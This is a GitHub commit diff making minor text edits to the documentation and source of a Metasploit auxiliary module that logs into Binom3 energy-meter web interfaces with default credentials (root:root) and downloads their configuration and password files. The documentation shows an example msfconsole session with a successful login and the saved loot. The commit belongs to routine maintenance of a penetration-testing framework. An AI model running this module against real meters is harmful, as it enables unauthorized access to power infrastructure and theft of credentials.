Skip to content

Commit 423648e

Browse files
committed
Minor edits
1 parent 82d2777 commit 423648e

File tree

2 files changed

+5
-5
lines changed

2 files changed

+5
-5
lines changed

documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -11,19 +11,19 @@ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Qual
1111

1212
```
1313
msf > use auxiliary/scanner/http/binom3_login_config_pass_dump
14-
msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.2.3.4
14+
msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.3.3.7
1515
msf auxiliary(binom3_login_config_pass_dump) > run
1616
17-
[+] 1.3.3.7:80 - Running Binom3...
17+
[+] 1.3.3.7:80 - Binom3 confirmed...
1818
[*] 1.3.3.7:80 - Trying username:"root" with password:"root"
1919
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "root":"root"
2020
[+] ++++++++++++++++++++++++++++++++++++++
21-
[+] #{rhost} - dumping configuration
21+
[+] 1.3.3.7 - dumping configuration
2222
[+] ++++++++++++++++++++++++++++++++++++++
2323
[+] 1.3.3.7:80 - File retrieved successfully!
2424
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_moduletest_1.3.3.7_Binom3_config_165927.txt
2525
[+] ++++++++++++++++++++++++++++++++++++++
26-
[+] #{rhost} - dumping password file
26+
[+] 1.3.3.7 - dumping password file
2727
[+] ++++++++++++++++++++++++++++++++++++++
2828
[+] 1.3.3.7:80 - File retrieved successfully!
2929
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000004_moduletest_1.3.3.7_Binom3_passw_010954.txt

modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -95,7 +95,7 @@ def is_app_binom3?
9595

9696
if (res && res.code == 200 && res.headers['Server'] && (res.headers['Server'].include?('Team-R Web') || res.body.include?('binom_ico') || res.body.include?('team-r')))
9797

98-
print_good("#{rhost}:#{rport} - Running Binom3...")
98+
print_good("#{rhost}:#{rport} - Binom3 confirmed...")
9999

100100
return true
101101
else

0 commit comments

Comments
 (0)